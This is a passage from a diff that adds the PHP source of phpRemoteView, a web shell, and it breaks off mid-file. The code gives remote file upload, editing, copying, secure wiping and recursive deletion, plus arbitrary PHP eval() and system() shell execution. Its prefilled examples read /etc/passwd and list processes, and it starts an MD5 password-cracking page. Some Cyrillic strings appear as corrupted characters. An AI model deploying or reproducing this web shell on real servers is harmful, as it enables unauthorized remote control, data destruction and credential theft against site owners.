+<input type=submit value='".mm("TOUCH")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("Set current 'mtime'")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=wipe>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("WIPE(delete)")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Write '0000..' and delete")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+</tr></table>
+";
+
+   echo "<form action=$self method=post><input type=hidden name=c value=copy>".
+        "<b>".mm("COPY FILE")."</b> ".mm("from")." <input type=text size=40 name=from value=\"".htmlspecialchars($d.$f)."\">".
+        " ".mm("to")." <input type=text name=to size=40 value=\"".htmlspecialchars($d.$f)."\">".
+        "<nobr><input type=submit value='".mm("COPY")."!'>".
+        "&gt;<input type=checkbox name=confirm value=copy></nobr></form>";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (".mm("type full path").")
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d.$f)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>FILE UPLOAD: ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"$d$f\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+break;
+
+
+case "base64":
+
+   echo "<pre>\n";
+   $ff=fopen($d.$f,"rb") or exit("<p>access denied");
+   $text=fread($ff,max(filesize($d.$f),$maxsize_fread));
+   fclose($ff);
+   switch ($c2) {
+      case 0:
+         echo base64_encode($text);
+         break;
+      case 1:
+         echo chunk_split(base64_encode($text));
+         break;
+      case 2:
+         $text=base64_encode($text);
+         echo substr(preg_replace("!.{1,76}!","'\\0'.\n",$text),0,-2);
+         break;
+      case 3:
+         echo base64_decode($text);
+         break;
+   }
+   break;
+
+
+
+case "d": // information for DIRECTORY
+
+   echo $GLOBALS['html'];
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+
+   //up_link($d,"");
+
+   if (!realpath($d) || !is_dir($d.$f)) exit(mm("dir not found"));
+
+   echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>";
+
+   echo "<table border=0 cellspacing=1 cellpadding=1 class=tab>";
+   echo "<tr class=tr><td>&nbsp;&nbsp;&nbsp;".mm("Owner")."/".mm("Group")."&nbsp;&nbsp;&nbsp;</td><td>";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "</td></tr><tr class=tr><td>";
+   echo mm("Perms")."</td><td>".display_perms(fileperms($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Create time")."</td><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Access time")."</td><td>".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("MODIFY time")."</td><td>".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+
+   echo "</tD><form action=$self method=get><td width=70>&nbsp;</td><td>
+   <input type=hidden name=c value=\"tree\">
+   Root <input type=text name=d value=\"$d\"><br>
+   <input type=checkbox name=showfile value=1 id=tree1><label for=tree1>Show files in tree</label><br>
+   <input type=checkbox name=showsize value=1 id=tree2 checked><label for=tree2>Show dir/files size</label><br>
+   <input type=submit value='Show TREE directory'>";
+
+   echo "</td></form></tr></table><P>";
+
+
+   
+   if (!$write_access) exitw();
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=files>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all files in dir")." (rm *)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=dir>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+</tr></table>
+";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (type full path)
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>(FILE UPLOAD) ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"".realpath($d)."/\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+
+break;
+
+
+
+case "tree":
+
+$tcolors=array(
+'eee','ddd','ccc','bbb','aaa','999','888','988','a88','b88','c88','d88','e88','d98',
+'ca8','bb8','ac8','9d8','8e8','8d9','8ca','8bb','8ac','89d','88e');
+
+function dir_tree($df,$level=0) {
+   global $tcolors,$self;
+
+   $df=str_replace("//","/",$df);
+   $dirs=array();
+   $files=array();
+   if ($dir=opendir($df)) {
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            $dirs[]=$file;
+         }
+         else {
+            $files[]=$file;
+         }
+      }
+   }
+   closedir($dir);
+
+   sort($dirs);
+   sort($files);
+   
+   $i=min($level,count($tcolors)-1);
+   $c=$tcolors[$i][0].$tcolors[$i][0].$tcolors[$i][1].$tcolors[$i][1].$tcolors[$i][2].$tcolors[$i][2];
+
+   echo "\r\n\r\n\r\n
+   <table width=100% border=0 cellspacing=2 cellpadding=1><tr><td bgcolor=#000000>
+   <table width=100% border=0 cellspacing=0 cellpadding=1 bgcolor=#$c>
+   <tr><td colspan=3 class=dir>".
+   "<a href=$self?c=l&d=".urlencode($df)." class=dir><img src=$self?name=dir&c=img&1 border=0>".
+   $df."</a></td></tr>";
+
+   if (count($dirs) || count($files)) {
+      echo "<tr><td width=15>&nbsp;</td><td class=all width=97%>";
+      for ($i=0; $i<count($files); $i++) {
+         echo $files[$i]." ";
+      }
+      for ($i=0; $i<count($dirs); $i++) {
+         dir_tree($df."/".$dirs[$i],$level+1);
+      }
+      echo "</td><td width=10>&nbsp;</td></tr>";
+   }
+   echo '</table></td></tr></table>';
+}
+
+   echo "
+   <STYLE>
+   .all {
+   font-family: Verdana;
+   font-size: 80%;
+   }
+   .dir {
+   font-family: Verdana;
+   font-size: 95%;
+   background: #666699;
+   font-weight: bold;
+   color: white
+   }
+   </STYLE>";
+   echo $GLOBALS['html'];
+
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+   dir_tree($d);
+   break;
+
+
+
+case "delete":
+
+   if (!$write_access) exitw();
+
+   if (!isset($c2)) exit("err# delete 1");
+   if (!isset($confirm) || strlen($confirm)<3) exit("".mm("Confirm not found (go back and set checkbox)")."");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a><p>";
+   if (!isset($d) || !isset($f) || !@file_exists($d.$f) || !@realpath($d.$f)) 
+      exit("".mm("Delete cancel - File not found")."");
+   if (realpath(getenv("SCRIPT_FILENAME"))==$d.$f && !isset($delete_remview_confirm))
+      exit(mm("Do you want delete this script (phpRemoteView) ???")."<br><br><br><br>
+      <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".urlencode($f)."&delete_remview_confirm=YES'>[".mm("YES").", ".mm("DELETE")." <b>".mm("ME")."</b>]</a>
+       &nbsp; &nbsp; &nbsp;
+      <a href='javascript:history.back(-1)'>[".mm("NO (back)")."]</a>");
+
+   switch ($c2) {
+   case "delete":
+       //exit("$d $f");
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Delete cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<P><a href=$self?c=l&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Delete ok")."";
+       break;
+   case "touch":
+       ob();
+       if (!touch($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Touch cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Touch ok (set current time to 'modify time')")."";
+       break;
+   case "clean":
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Clean (empty file) cancel")." - ".mm("ACCESS DENIED")."</b></font>obb"); 
+       ftruncate($fi,0);
+       fclose($fi);
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Clean ok (file now empty)")."";
+       break;
+   case "wipe":
+       $size=filesize($d.$f);
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Wipe cancel - access denied")."</b></font>$obb");
+       $str=md5("phpspbru".mt_rand(0,999999999).time());
+       for ($i=0; $i<5; $i++) $str.=$str; // strlen 1024 byte
+       for ($i=0; $i<intval($size/1024)+1; $i++) fwrite($fi,$str);
+       fclose($fi);
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("err# delete 2 - file was rewrite, but not delete...(only write access, delete disable)$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<a href=$self?c=i&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Wipe ok (file deleted)")."";
+       break;
+   }
+
+   //Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   //echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+
+   break;
+
+
+case "dirdelete":
+
+   if (!$write_access) exitw();
+
+function dir_delete($df) {
+   echo "<b>".basename($df)."</b><ul>";
+   if ($dir=opendir($df)) {
+      $i=0;
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            dir_delete($df."/".$file);
+         } 
+         else {
+            echo "$file<br>";
+            echo "".mm("DELETE")." <tt>$df/$file</tt> ...<br>";
+            unlink($df."/".$file);
+         }
+         $i++;
+      }
+      //if ($i==0) echo "-empty-<br>";
+   }
+   closedir($dir);
+   echo "</ul>";
+   echo "".mm("DELETE")." ".mm("DIR")." <tt>$df</tt> ...<br>";
+   rmdir("$df/$file");
+}
+
+   if (!isset($c2)) exit("error dirdelete 1");
+   if (!isset($confirm)) exit("".mm("Confirm not found (go back and set checkbox)")."!");
+   $df="$d";
+
+   switch ($c2) {
+
+      case "files":
+         echo "<h3>".mm("Deleting all files in")." <tt>$df</tt> ...</h3>";
+         if ($dir=opendir($df)) {
+            while (($file=readdir($dir))!==false) {
+                if ($file=="." || $file=="..") continue;
+                if (is_dir($df.$file))  {
+                   echo "<big><tt><b>>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+                elseif (is_file($df.$file)) {
+                   echo "<big><tt><b><font color=red>$file</font></b></tt></big> ".mm("deleting")."...";
+                   unlink($df.$file);
+                   echo "<br>";
+                }
+                else {
+                   echo "<big><tt><b>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+            }  
+         }
+         closedir($dir);
+         $ref="$self?c=l&d=".urlencode($d);
+         break;
+   
+      case "dir":
+         echo "<h3>".mm("Deleting all dir/files (recursive) in")." <tt>$df</tt> ...</h3>";
+         dir_delete($df);
+         $ref="$self?c=l&d=".urlencode(realpath($d."/.."));
+         break;
+   }
+   //header("Location: $ref");
+   echo "<p><a href=$ref>".mm("DONE, go back")."</a>";
+   break;
+
+case "copy": 
+
+   if (!$write_access) exitw();
+
+   if (!isset($from) || !@file_exists($from) || !@realpath($from))
+      exit("err# copy 1, file [$from] not found");
+   if (!isset($to) || strlen($to)==0)
+      exit("err# copy 2, file [$to] not found");
+   echo "Copy: ....<hr size=1 noshade>";
+   if (!copy($from,$to)) { 
+      echo "<hr size=1 noshade><font color=red><b>Error!</b></font><p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."<p>";
+   }
+   else
+      echo "".mm("DONE")."!<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."</a> (dir 'from')<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($to)).">".dirname($to)."</a> (dir 'to')<p>";
+   break;
+
+
+
+
+case "e": // edit
+
+   if (!$write_access) exitw();
+
+   if (!@realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg="(<font color=#009900><b>".mm("full read/write access")."</b></font>)";
+   echo "<p><b>".mm("EDIT FILE")."</b> $msg<p>";
+
+   if (!$fi=@fopen($d.$f,"rb")) exit("".mm("can't open, access denied")."");
+   echo "<form action=$self method=post>
+   <input type=hidden name=c value=e_submit>
+   <input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+   <input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+   <textarea name=text cols=70 rows=20 style='width: 100%;'>".
+   htmlspecialchars(fread($fi,filesize($d.$f)))."</textarea><p>
+   <input type=submit value=' ".mm("SAVE FILE (write to disk)")." '>
+   <input type=checkbox name=confirm value=1 id=conf> 
+   <label for=conf><font color=red><b><= confirm</b></font></label>
+   </form>";
+
+   break;
+
+
+case "e_submit":
+
+   if (!$write_access) exitw();
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("file not found");
+   if (!isset($text)) exit("err# e_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($d.$f,"w+")) exit("access denied");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+   echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">SAVE DONE (go back)!</a>";
+
+   break;
+
+
+
+case "newfile_submit":
+
+   if (!$write_access) exitw();
+
+   if (!isset($text) || !isset($df)) exit("err# newfile_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($df,"w+")) exit("access denied, can't create/open [$df]");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+   break;
+
+
+case "fileupload_submit":
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newfile_submit 1");
+   if (!isset($df3)) exit("err# newfile_submit 2");
+
+   $fname="";
+   if (isset($df2)) { 
+      if (!preg_match("~([^/]+)$~",$HTTP_POST_FILES['userfile']['name'],$ok)) {
+         exit("Upload failed: can't detect file name");
+      }
+      $fname=$ok[1];
+   }
+   else {
+      $fname=$df3;
+   }
+   if ($fname=="") 
+     exit("".mm("You mast checked 'create file name automatic' OR typed file name!").""); 
+   if (isset($df4)) $fname=strtolower($fname);
+
+   echo "Temp file: ".$HTTP_POST_FILES['userfile']['tmp_name']."<br>";
+   echo "Origin file name: ".$HTTP_POST_FILES['userfile']['name']."<br>";
+   echo "File size: ".$HTTP_POST_FILES['userfile']['size']."<br>";
+   if ($df[strlen($df)-1]!="/") $df.="/";
+   echo "".mm("SAVING TO").": <font color=blue>$df</font><font color=red><b>$fname</b></font><p>";
+
+   ob();
+   $ok=copy($HTTP_POST_FILES['userfile']['tmp_name'],"$df$fname");
+   obb();
+   if (!$ok) exit("<font color=red><b>".mm("Sorry, access denied")."</b></font> $obb");
+
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>NEW FILE SAVED</a>";
+  
+   break;
+
+
+case "newdir_submit": 
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newdir_submit 1");
+   ob();
+   if (!mkdir($df,$mkdir_mode)) {
+      obb();
+      exit("Access denied $obb");
+   }
+   obb();
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>Go to new directory!</a>";
+
+   break;
+
+
+case "t": 
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+
+   if (!$write_access) exitw();
+   error_reporting(2038);
+
+   if (!isset($php)) {
+      $php="/* line 1 */\n\n// ".mm("for example, uncomment next line").":\nphpinfo();\n\n//readfile(\"/etc/passwd\");\n\n/* line 8 */";
+      $skipphp=1;
+      $pre='checked';
+      $nlbr='';
+      $xmp='';
+      $htmls='checked';
+   } 
+
+   echo "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"&lt;?\" ".mm("and")." \"?&gt;\")
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=php rows=".(!isset($skipphp)?10:4)." cols=60 style='width:100%;'>$php</textarea>
+<input type=checkbox name=pre value='checked' $pre id='pre'>
+   <label for='pre'> add &lt;pre&gt;</label> &nbsp;
+<input type=checkbox name=xmp value='checked' $xmp id='xmp'>
+   <label for='xmp'> add &lt;xmp&gt;</label> &nbsp;
+<input type=checkbox name=htmls value='checked' $htmls id='htmls'>
+   <label for='htmls'> add htmlspecialchars()</label> &nbsp;
+<input type=checkbox name=nlbr value='checked' $nlbr id='nlbr'>
+   <label for='nlbr'> add nl2br()</label><br>
+<input type=submit></form>
+<P>";
+
+   if (!isset($shell)) $skipshell=1;
+
+   if (!isset($skipphp)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      if ($pre<>'') echo "<pre>";
+      if ($xmp<>'') echo "<xmp>";
+      if ($nlbr<>'' || $htmls<>'') {
+         ob_start();
+      }
+      if ($phpeval_access) eval($php);
+      else die("Sorry, function eval() disabled.");
+      if ($nlbr<>'' || $htmls<>'') {
+         $tmp=ob_get_contents();
+         ob_end_clean(); 
+         if ($htmls<>'') $tmp=htmlspecialchars($tmp);
+         if ($nlbr<>'') $tmp=nl2br($tmp);
+         echo $tmp;
+      }
+      if ($xmp<>'') echo "</xmp>";
+      if ($pre<>'') echo "</pre>";
+      echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      echo "</table></table></table></table></table></table></table></table></table></center></table><hr size=1 noshade>";
+   }
+
+   if (!isset($shell)) {
+      $shell="#".mm("example (remove comments '#')").": \n\n#cat /etc/passwd;\n\n#ps -ax\n\n#uname -a";
+      $skipshell=1;
+   }
+   echo "<P><b>".mm("Shell commands")."</b>
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=shell rows=".(!isset($skipshell)?10:4)." cols=60 style='width:100%;'>$shell</textarea><br>
+<input type=submit></form>
+<P>";
+   if (!isset($skipshell)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
+      if ($system_access) system($shell);
+      else die("Sorry, function system() disabled.");
+      echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
+      </table></table></table></table></table></table></table></table></table></center><hr size=1 noshade>";
+   }
+
+
+  $ttype=array(1=>"MD5",7=>"Decode MD5 (password crack)<br>",
+  2=>"Base64",3=>"Base64 + chunk",4=>"Base64 + chunk + quotes",
+  5=>"Decode Base64<br>",
+  6=>"UnixTime=>Date(".time().")",
+  8=>"MKtime: YYYY MM DD [hh [mm [ss]]]<br>",
+  9=>"Translit=&gt;RusText", 14=>"RusText=&gt;Translit<br>",
+  10=>"cp1251=&gt;koi8r",11=>"koi8r=&gt;cp1251",12=>"cp1251=&gt;mac",13=>"mac=&gt;cp1251",
+  15=>"koi8r=&gt;mac",16=>"mac=&gt;koi8r",
+  );
+  echo "<P><b>".mm("Universal convert")."</b>";
+
+  echo "<a name=convert></a><form action='$self#convert' method=post>";
+  foreach ($ttype as $k=>$v) 
+     echo "&nbsp;&nbsp;<nobr><input ".($k==$name?"checked":"")." type=radio name=name value=$k id=x$k><label for=x$k>$v</label></nobr> ";
+
+  echo "
+<input type=hidden name=c value=t>
+<textarea name=convert rows=".(isset($convert)?10:3)." cols=60 style='width:100%;'>".htmlspecialchars($convert)."</textarea><br>
+<input type=submit><br>";
+
+   
+   $russtr1="JCUKENGZH_FYVAPROLDESMIT_Bjcukengzh_fyvaproldesmit_b";
+   $russtr2="����������������������������������������������������";
+   function from_translit($ss) {
+      global $russtr1,$russtr2;
+      $w=array("Sch",'�',"SCH",'�',"ScH",'�',"SCh",'�',"sch",'�',"Jo",'�',"JO",'�',"jo",'�',
+      "Zh",'�',"ZH",'�',"zh",'�',"Ch",'�',"CH",'�',"ch",'�',"Sh",'�',"SH",'�',"sh",'�',
+      "##",'�',"''",'�',"Eh",'�',"EH",'�',"eh",'�',"Ju",'�',"JU",'�',"ju",'�',"Yu",'�',
+      "YU",'�',"yu",'�',"YA","�","Ya","�","ya","�","Ja",'�',"JA",'�',"ja",'�');
+      $c=count($w);
+      for ($i=0; $i<$c; $i+=2) $ss=str_replace($w[$i],$w[$i+1],$ss);
+      $ss=strtr($ss,$russtr1,$russtr2);
+      $ss=preg_replace("!([�-�]+)~([�-�]+)!is","\\1\\2",$ss);
+      return $ss;
+   }
+   function to_translit($ss) {
+      global $russtr1,$russtr2;
+      $ss=strtr($ss,$russtr2,$russtr1);
+      $ss=str_replace(
+         array('�', '�',  '�', '�', '�', '�', '�', '�', '�',  '�', '�', '�', '�', '�', ),
+         array('SH','SCH','ZH','YA','CH','YU','YO','sh','sch','zh','ya','ch','yu','yo',),
+         $ss);
+      return $ss;
+   }
+   
+   if (isset($convert)) {
+      if (!isset($name)) $name="0";
+      $out="";
+      switch ($name) {
+
+         case 1: 
+            $out=md5($convert);
+            break;
+
+         case 2:
+            $out=base64_encode($convert);
+            break;
+
+         case 3:
+            $out=chunk_split(base64_encode($convert));
+            break;
+
+         case 4:
+            $out=base64_encode($convert);
+            $out=substr(preg_replace("!.{1,76}!","'\\0'.\n",$out),0,-2);
+            break;
+
+         case 5:
+            $out=base64_decode($convert);
+            break;
+
+         case 6:
+            $convert=intval($convert);
+            if ($convert==0) $convert=time();
+            $out="Unixtime=$convert\n---Day/Month/Year--\n".
+               date("d/m/Y H:i:s",$convert)."\n".
+               date("d-m-Y H:i:s",$convert)."\n".
+               date("d.m.Y H:i:s",$convert)."\n".
+             "---Month/Day/Year--\n".
+               date("m/d/Y H:i:s",$convert)."\n".
+               date("m-d-Y H:i:s",$convert)."\n".
+               date("m.d.Y H:i:s",$convert)."\n".
+             "---------SQL-------\n".
+               date("Y-m-d H:i:s",$convert)."\n".
+               date("Y m d H i s",$convert)."\n".
+               date("YmdHis",$convert);
+            break;
+
+         case 8:
+            $c=explode(" ",trim(preg_replace("! +!"," ",$convert)));
+            if (count($c)<3 || count($c)>6) $out="Bad value. Type: 2000 12 31 or 2000 12 31 12 59 59";
+            else {
+               if (empty($c[0])) $c[0]=1970;
+               if ($c[0]<50) $c[0]=2000+$c[0];
+               if ($c[0]>50 && $c[0]<100) $c[0]=1900+$c[0];
+               if (empty($c[1])) $c[1]=1;
+               if (empty($c[2])) $c[2]=1;
+               if (empty($c[3])) $c[3]=0;
+               if (empty($c[4])) $c[4]=0;
+               if (empty($c[5])) $c[5]=0;
+               $out="TIME: $c[0]-$c[1]-$c[2] $c[3]:$c[4]:$c[5]\nMKTIME: ".mktime($c[3],$c[4],$c[5],$c[1],$c[2],$c[0]);
+            }
+            break;
+
+         case 9:
+            $out=from_translit($convert);
+            break;
+
+         case 14:
+            $out=to_translit($convert);
+            break;
+
+         case 10: $out=convert_cyr_string($convert,'w','k'); break;
+         case 11: $out=convert_cyr_string($convert,'k','w'); break;
+         case 12: $out=convert_cyr_string($convert,'w','m'); break;
+         case 13: $out=convert_cyr_string($convert,'m','w'); break;
+         case 15: $out=convert_cyr_string($convert,'k','m'); break;
+         case 16: $out=convert_cyr_string($convert,'m','k'); break;
+
+         case 7:
+            echo "<script>top.location.href='$self?c=md5crack&text=$convert'</script>";
+            break;
+
+         case 0:
+            $out="Please select anythink function in list. Example: type 'test' and select 'md5'. Then click 'Submit'.";
+            break;
+
+         default: 
+            $out='Sorry, this function not work (try new versions)';
+      }
+      echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<pre><xmp>$out</xmp></pre>\n\n\n\n\n\n\n\n\n<hr size=1 noshade>";
+   }
+   
+   break;
+
+
+case "md5crack":
+
+   echo "<form action=$self name=main><input type=hidden name=c value=md5crack>
+   <h2>Decode MD5 (<a href=$self>home</a>|<a href=$self?c=t&name=1#convert>md5</a>)</h2><P>";
+
+   if (!isset($go)) {
+      if (!isset($fullqty)) $fullqty="";
+      if (!isset($fulltime)) $fulltime="";
+      if (!isset($php)) $php="";
+      if (!isset($from)) $from="";
+      echo "<b>STRING</b>: <input type=text name=text value='$text' size=40> (only 32 char: 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f)";
+      echo "<P><b>Range</b>: <input type=text name=php value=\"".htmlspecialchars($php)."\" size=90><br>";
+      $chars=array(
+      'a-z'=>"abcdefghijklmnopqrstuvwxyz",
+      'a-z,A-Z'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
+      'a-z,0-9'=>"abcdefghijklmnopqrstuvwxyz0123456789",
+      'a-z,A-Z,0-9'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
